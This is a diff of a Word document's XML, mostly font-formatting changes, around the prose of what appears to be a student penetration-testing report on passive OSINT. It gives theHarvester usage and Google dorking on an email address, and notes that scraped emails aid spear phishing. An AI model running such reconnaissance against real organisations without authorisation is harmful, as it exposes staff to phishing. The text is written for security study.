+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cstheme="minorHAnsi"/>
           <w:color w:val="000000"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="mark0vq449spz"/>
-          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cstheme="minorHAnsi"/>
           <w:color w:val="000000"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
           <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
@@ -1779,154 +1839,398 @@
       </w:r>
       <w:r>
         <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cstheme="minorHAnsi"/>
           <w:color w:val="000000"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
         <w:t xml:space="preserve"> (Open Source Intelligence) consists of fully passive reconnaissance where the attack begins with starting to gain information on an organisation using the methods &amp; resources explained below. OSINT is the initial stage of the penetration test in which there is no direct interaction with the target services which could alert them of any signs of attack such as port scanning or vulnerability scanning using online scanners. </w:t>
       </w:r>
     </w:p>
     <w:p>
-      <w:r>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
         <w:t>`theHarvester -d (Target domain) -b all</w:t>
       </w:r>
       <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
         <w:t>`</w:t>
       </w:r>
     </w:p>
     <w:p>
-      <w:r>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
         <w:t xml:space="preserve">This usage of theHarvester allows us to be able to scrape the internet against the target domain </w:t>
       </w:r>
       <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
         <w:t xml:space="preserve">giving us all known </w:t>
       </w:r>
       <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
         <w:t xml:space="preserve">domains which are hosted by the target on the internet. </w:t>
       </w:r>
       <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
         <w:t xml:space="preserve">Using the “all” option we are able to query all search engines </w:t>
       </w:r>
       <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
         <w:t>available from theHarvester</w:t>
       </w:r>
       <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
         <w:t>.</w:t>
       </w:r>
       <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
         <w:t xml:space="preserve">This can help us </w:t>
       </w:r>
       <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
         <w:t xml:space="preserve">to be able to </w:t>
       </w:r>
       <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
         <w:t xml:space="preserve">perform </w:t>
       </w:r>
       <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
         <w:t xml:space="preserve">further searches </w:t>
       </w:r>
       <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
         <w:t xml:space="preserve">against </w:t>
       </w:r>
       <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
         <w:t>domains which are internet facing to get</w:t>
       </w:r>
       <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
         <w:t xml:space="preserve"> further information</w:t>
       </w:r>
       <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
         <w:t xml:space="preserve">. </w:t>
       </w:r>
       <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
         <w:t xml:space="preserve">The tool </w:t>
       </w:r>
       <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
         <w:t>also gives us</w:t>
       </w:r>
       <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
         <w:t xml:space="preserve">a scrape of target emails </w:t>
       </w:r>
       <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
         <w:t xml:space="preserve">which have been </w:t>
       </w:r>
       <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
         <w:t>registered</w:t>
       </w:r>
       <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
         <w:t xml:space="preserve"> with the target domain</w:t>
       </w:r>
       <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
         <w:t xml:space="preserve"> which can aid</w:t>
       </w:r>
       <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
         <w:t xml:space="preserve"> in</w:t>
       </w:r>
       <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
         <w:t>phishing campaigns or spear phishing attacks</w:t>
       </w:r>
       <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
         <w:t>.</w:t>
       </w:r>
     </w:p>
     <w:p>
-      <w:r>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
         <w:t>I</w:t>
       </w:r>
       <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
         <w:t xml:space="preserve">nformation on </w:t>
       </w:r>
       <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
         <w:t>internet facing tar</w:t>
       </w:r>
       <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
         <w:t xml:space="preserve">get devices can </w:t>
       </w:r>
       <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
         <w:t xml:space="preserve">be gained </w:t>
       </w:r>
       <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
         <w:t xml:space="preserve">from three primary sources </w:t>
       </w:r>
       <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
         <w:t xml:space="preserve">which can help us </w:t>
       </w:r>
       <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
         <w:t xml:space="preserve">to </w:t>
       </w:r>
       <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
         <w:t xml:space="preserve">perform passive </w:t>
       </w:r>
       <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
         <w:t xml:space="preserve">reconnaissance </w:t>
       </w:r>
       <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
         <w:t xml:space="preserve">in which </w:t>
       </w:r>
       <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
         <w:t xml:space="preserve">direct contact is not made with our target to </w:t>
       </w:r>
       <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
         <w:t xml:space="preserve">maintain anonymity </w:t>
       </w:r>
       <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
         <w:t>and prevent</w:t>
       </w:r>
       <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
         <w:t xml:space="preserve">ion of being blocked by any potential defences. </w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
+        <w:jc w:val="center"/>
       </w:pPr>
       <w:r>
         <w:t xml:space="preserve">Google </w:t>
@@ -1937,132 +2241,352 @@
       <w:r>
         <w:t>orks</w:t>
       </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
+      <w:r>
+        <w:t xml:space="preserve"> with GHDB (Google Hacking Database</w:t>
+      </w:r>
+      <w:r>
+        <w:t>)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
         <w:t>Google dorking is</w:t>
       </w:r>
       <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
         <w:t xml:space="preserve"> the </w:t>
       </w:r>
       <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
         <w:t>use of the google</w:t>
       </w:r>
       <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
         <w:t xml:space="preserve">engine </w:t>
       </w:r>
       <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
         <w:t xml:space="preserve">to filter information based upon certain keywords. </w:t>
       </w:r>
       <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
         <w:t>This can be done with quotation</w:t>
       </w:r>
       <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
         <w:t xml:space="preserve"> marks surrounding email addresses.</w:t>
       </w:r>
       <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
         <w:t>If the email address is included in a</w:t>
       </w:r>
       <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
         <w:t xml:space="preserve">ny specific pages </w:t>
       </w:r>
       <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
         <w:t xml:space="preserve">on Google this </w:t>
       </w:r>
       <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
         <w:t xml:space="preserve">filtered result will help us </w:t>
       </w:r>
       <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
         <w:t xml:space="preserve">to see these pages. </w:t>
       </w:r>
       <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
         <w:t xml:space="preserve">The operator for seeing such information would be quotation marks surrounding the email address as follows: </w:t>
       </w:r>
-      <w:hyperlink r:id="rId4" w:history="1">
+      <w:hyperlink r:id="rId5" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
+            <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+            <w:sz w:val="24"/>
+            <w:szCs w:val="24"/>
           </w:rPr>
           <w:t>target-email@organisation.com</w:t>
         </w:r>
       </w:hyperlink>
     </w:p>
     <w:p>
-      <w:r>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
         <w:t xml:space="preserve">A live example can be the use of my </w:t>
       </w:r>
       <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
         <w:t xml:space="preserve">Durham </w:t>
       </w:r>
       <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
         <w:t xml:space="preserve">email address </w:t>
       </w:r>
       <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
         <w:t xml:space="preserve">on the Google </w:t>
       </w:r>
       <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
         <w:t xml:space="preserve">search engine. </w:t>
       </w:r>
       <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
         <w:t xml:space="preserve">Using </w:t>
       </w:r>
       <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
         <w:t xml:space="preserve">quotation marks </w:t>
       </w:r>
       <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
         <w:t>I can see wh</w:t>
       </w:r>
       <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
         <w:t xml:space="preserve">ich pages my </w:t>
       </w:r>
       <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
         <w:t>email address may be hosted</w:t>
       </w:r>
       <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
         <w:t xml:space="preserve">, </w:t>
       </w:r>
       <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
         <w:t xml:space="preserve">some of these pages can be a result of leakage from </w:t>
       </w:r>
       <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
         <w:t xml:space="preserve">servers requiring authorisation. </w:t>
       </w:r>
     </w:p>
     <w:p>
-      <w:r>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
         <w:t xml:space="preserve">Figure 1 </w:t>
       </w:r>
       <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
         <w:t xml:space="preserve">will </w:t>
       </w:r>
       <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
         <w:t>show the use of quotation marks around my email address</w:t>
       </w:r>
       <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
         <w:t xml:space="preserve">, </w:t>
       </w:r>
       <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
         <w:t xml:space="preserve">this </w:t>
       </w:r>
       <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
         <w:t xml:space="preserve">points to a staff list </w:t>
       </w:r>
       <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
         <w:t xml:space="preserve">hosted by </w:t>
       </w:r>
       <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
         <w:t xml:space="preserve">Department of Physics on a </w:t>
       </w:r>
       <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
         <w:t>server which requires authentication</w:t>
       </w:r>
       <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
         <w:t xml:space="preserve">. </w:t>
       </w:r>
     </w:p>
@@ -2091,7 +2615,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill rotWithShape="1">
-                    <a:blip r:embed="rId5"/>
+                    <a:blip r:embed="rId6"/>
                     <a:srcRect t="-1" b="32884"/>
                     <a:stretch/>
                   </pic:blipFill>
@@ -2153,79 +2677,213 @@
       </w:r>
     </w:p>
     <w:p>
-      <w:r>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
         <w:lastRenderedPageBreak/>
         <w:t>Upon</w:t>
       </w:r>
       <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
         <w:t xml:space="preserve"> further investigation as seen in figure 2</w:t>
       </w:r>
       <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
         <w:t xml:space="preserve">and figure 3, this </w:t>
       </w:r>
       <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
         <w:t xml:space="preserve">server is designed to be </w:t>
       </w:r>
       <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
         <w:t xml:space="preserve">accessible </w:t>
       </w:r>
       <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
         <w:t>only for authorised sta</w:t>
       </w:r>
       <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
         <w:t>ff</w:t>
       </w:r>
       <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
         <w:t xml:space="preserve"> (https://www.physics.dur.ac.uk)</w:t>
       </w:r>
       <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
         <w:t>.</w:t>
       </w:r>
       <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
         <w:t xml:space="preserve">The use of Google dorking an email address can </w:t>
       </w:r>
       <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
         <w:t xml:space="preserve">be a hit/miss </w:t>
       </w:r>
       <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
         <w:t xml:space="preserve">process; in some cases of OSINT the email address can be a breakthrough to provide a </w:t>
       </w:r>
       <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
         <w:t xml:space="preserve">lot </w:t>
       </w:r>
       <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
         <w:t xml:space="preserve">more </w:t>
       </w:r>
       <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
         <w:t xml:space="preserve">information </w:t>
       </w:r>
       <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
